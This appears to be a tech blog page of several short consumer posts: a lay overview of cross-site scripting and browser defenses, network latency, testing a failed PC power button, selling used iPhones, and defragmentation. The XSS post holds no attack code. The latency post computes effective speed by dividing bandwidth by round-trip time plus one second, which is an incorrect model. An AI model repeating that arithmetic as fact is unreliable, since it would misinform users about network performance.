We all know that security on the internet is a major topic nowadays.  Even after you install your brand new web browser and you install your brand new antivirus, you are still vulnerable.  Why is that?  A large part of internet security “holes” or places you are most likely to receive and attack from are actually the things you installed yourself.

XSS is an abbreviation for Cross-Site Scripting, what this used to refer to when it was first discovered was when a third party website used your credentials to log into another website or to steal your information directly through another website.  It has since expanded into covering many more injection style attacks that target client side scripts.

Client side scripting is mainly referring to JavaScript although other ones do exist.  Server side scripting uses languages like PHP and Perl.  Client side scripts are how websites and your computer tie together to execute code on your computer.  These scripts have access to cookies as a means of storing and retrieving data.  Probably the most important cookie from this context is the Session Cookie,  websites use session cookies to log you in and keep you logged in as long as you are at the site or for a certain length of time until the cookie expires.  If another site is injecting code into your scripts or entire scripts into your web browser what is keeping them from simply looking at your session cookies and copying your credentials.  Congratulations, you’ve now experienced one of the most common forms of identity theft on the internet.

Web browsers have done their best to take up the task of blocking XSS attacks from occurring.  Many of today’s browsers support an attribute called HTTP only for their cookies which blocks scripts from accessing them.  This however does not solve all the problems XSS presents.  Script blocking, either in the browser or by using a third party add-on like No Script for Firefox which provides Domain level blocking(it blocks it by the name of the website)  are some more ways to help control the problem.  By blocking most of everything and only allowing the scripts you want to run you can protect yourself from a vast majority of XSS attacks.  Some people consider No Script to be too much of a burden though as it can break the functionality of many websites until properly set up.

So with all of these companies focusing on fixing XSS and preventing this problem why is it still so prevalent?  For the most part, Flash.  Adobe’s Flash player isn’t just a client side codebase, it’s practically an entire platform for running rich media content on a remote pc.  Not only it used to provide videos and music players, interactive game platforms and user interaction, but it can be used for advertising too, XSS opportunities crop up like weeds when flash ad’s get loaded.

That being said it’s not entirely Adobe’s fault.  Sloppy coding practices, non sanitized inputs, and vulnerabilities in other software itself contribute to the problem as well.  Be wary of your scripts and who sends them to you.  If you are browsing unknown websites tools like No Script can be a lifesaver.

When someone says that their computer is slow, it isn’t actually the speed they are complaining about.  They say the computer is slow because it is unresponsive.  The PC may be fast enough speed wise to compute all of their needs in a timely fashion, however when they try to go open another program, they find themselves waiting.  The same concept applies to network latency.

The speed rating of your internet connection is based on its maximum throughput under ideal conditions.  As much as I dislike using pipe analogies when talking about network connections; it really is the most ideal in this situation.  If you think about a pipe with water flowing in it with a valve in the middle, the amount of water flowing when the valve is open is the bandwidth.  Now, let’s say the valve opens and closes a lot, because it is dispensing very specific amounts of water.

When you click on a link, the valve opens, but the amount of time your message to open the valve takes to get to the valve is called your Latency.  The time it takes to get to the valve and the water to start coming to you is called the ping time, or round trip latency.

How this impacts bandwidth is a little devious, as well as potentially crippling.  Bandwidth is measured as “data measurement / time measurement” in this case its Mb/s.  Latency increases the amount of time it is taking to get the data from the server to you.  If you had a 1.5Mb satellite connection, its average round trip latency is somewhere in the neighborhood of 1000ms-1500ms.  You add this to the bandwidth equation to get what the connection really feels like in terms of speed.

Taking 1.5Mb or 1536kb and dividing it by 2 seconds instead of 1, (1000ms = 1 s) gives us an average bandwidth of 768Kb/s.  Dividing it by 2500ms (initial 1 second measurement + latency) gives us a speed of 614Kb/s.  Of course that is also on a single load, if you are using a website that uses multiple loads when you make selections in drop down lists this penalty is applied every time the page loads.  To give a real world example, my parent’s satellite internet was 768k and had an average latency of 1800ms.  768/2.8 = 274Kb/s, and it felt like it.

Now sure, if you are downloading large files that don’t change often, the speed picks up.  If it was only 274k a download would top out around 35KB/s.(Kb/8 = KB) Theirs topped out around 100KB/s but the actual experience of using it was abysmal.  You were lucky if you could even get to a YouTube video, much less watch it.  Everything nowadays has been organized into small “web ready” packets for easy streaming.  This approach cripples a high latency connection.

This wasn’t meant as a knock on satellite internet.  It serves an important niche where the only other choice may be dial up.  Just remember though, speed is not always speed, and responsiveness is one of the most underrated metrics in the world.

When you come home from work and sit down by the pc to check what your friends were up to during the day, or you wake up and want to check last night’s late game score; the last thing you want to experience is silence when you press the power button.  You apprehensively check the power connection, it’s plugged in and the strip is on.  So what gives? the power supply?  Not always.

On an ATX power supply the actual “power switch” is built into the supply.  However, it uses a circuit to detect when to switch on and holding that circuit closed tells the power supply to shut down.  That is the function of the “Power Button” on the front of your case.  The mechanism in these switches is usually quite cheaply made.  So what happens when it fails?  You get no power.

The button is wired into a pair of leads on the front panel connector of the motherboard.  Other items that may be connected to this panel include: the reset button, the power LED lights, the Hard drive activity light, and perhaps the pc speaker.  There’s 2 ways to test for a bad power button switch.

The first way is to take the reset switch and plug it into the power switch leads, and press the reset switch.  If it turns on, there you go; bad switch.  The other way carries a little bit of danger with it and you need to be careful with it.  Closing the switch basically just bridges or “shorts” the connection.  You can take a regular flat head screwdriver and touch it to the 2 leads and see if the pc turns on.

If you touch the wrong leads you might perform an activity known as “letting the magic smoke out” .  In this case you could fry some of the caps and you will know you’ve done this by the small trail of blue smoke immediately followed by the smell of sulfur and burnt plastic.  Needless to say this is not the outcome you desire.

So whenever possible use the reset switch.  The only 2 times it should not be possible are if you’ve already had a failed switch and you are using the reset switch for a power button, or the manufacturer put all the front panel connectors in a single plastic plug.

If you decide to replace the switch, known that you will most likely have to contact either the manufacturer  of the pc or the case to attain a perfect match.  If you do not want to do this or the manufacturer wants too much or won’t sell you one; you can go to your local Radio Shack or hardware store and pickup a momentary contact switch with 2 leads.  You might have to do some cosmetic alterations to your case though as no 2 switches ever seem to use the same mounting pattern.

So, just today I sent in my old iPhone 3G to a place that buys used iPhones, iPods, laptops, etc.  I got $95 for it, which isn’t bad, considering I got a lot of use out of it, and it’s just been sitting collecting dust.

New websites that will buy your used electronics are popping up on the web every day.  The majority of companies are buying iPhones in order to fix them up a bit (if needed), refurbish them, perhaps unlock them, and then turn around and sell them.

You could certainly try and sell your phone on eBay, but you should first check completed auctions to see how much you’d probably get.  And keep in mind, if you’re phone is broken, most people won’t want it on eBay.  These other websites will buy your broken iPhone because certain parts inside are salvageable and would aid in refurbishing a close-to-perfect phone.

So, if you’ve been wondering what to do with that old iPhone, below are some places to check out.  Keep in mind, I’ve only dealt with cashforiphones.com.

iPhone Recycling:

CashforiPhones.com – a simple, easy transaction, and offered more $ than most websites

BuyBackMac.com – I noticed that would have given me another $10 for my phone

There were a few others that I saw online but they only offered $60 to $80.

To keep your computer running as fast as possible, it is important to perform certain maintenance tasks on it. One these tasks are called defragmenting your hard drive(s) or defrag for short.

What is defragmentation?

Let’s say you have saved a bunch of files to a brand new hard drive (HD) and then over time you remove half of them. Those spaces or blocks you removed the files from are empty but scattered throughout the HD. Now let’s say you save a much larger file to the HD. The system will use the smaller blocks first thus breaking the file into pieces. When you go to open that file, the system needs to reassemble the file and depending on how many blocks the file resides in will depend on how long it will take to open. Defragging your HD will put those pieces in order allowing the system to find them faster and open quicker. Running periodic defrags will keep your system running as fast as possible and although Windows comes with its own utilities including one for defragging, I use a software called Defraggler.

Defraggler

Defraggler can be found here and is developed by Piriform. With Defraggler you can analyze and defrag your HDs as well as certain folders and files. I found it to be very fast and a better utility than the one offered by Windows.